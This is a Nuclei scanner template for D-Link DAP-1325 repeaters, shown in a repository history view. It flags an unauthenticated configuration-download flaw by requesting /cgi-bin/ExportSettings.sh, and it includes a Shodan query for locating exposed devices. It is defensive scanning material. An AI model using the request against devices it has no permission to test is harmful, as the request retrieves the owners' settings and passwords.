nuclei-templates/http/misconfiguration/dlink-config-dump.yaml

40 lines
1.0 KiB
YAML
Raw Normal View History

2023-07-10 12:47:56 +00:00
id: dlink-config-dump
info:
2023-07-10 12:47:56 +00:00
name: D-Link DAP-1325 - Information Disclosure
author: gy741
severity: critical
description: |
Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
reference:
- https://www.exploit-db.com/exploits/51556
2023-07-08 06:52:18 +00:00
- https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
metadata:
max-request: 1
shodan-query: title:"D-LINK"
2023-07-10 12:47:56 +00:00
tags: config,dump,dlink,auth-bypass,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportSettings.sh"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Password"
2023-07-10 12:47:56 +00:00
case-insensitive: true
- type: regex
part: header
regex:
- 'filename="(.*)_Settings.dat'
- 'application/octet-stream'
condition: and
- type: status
status:
- 200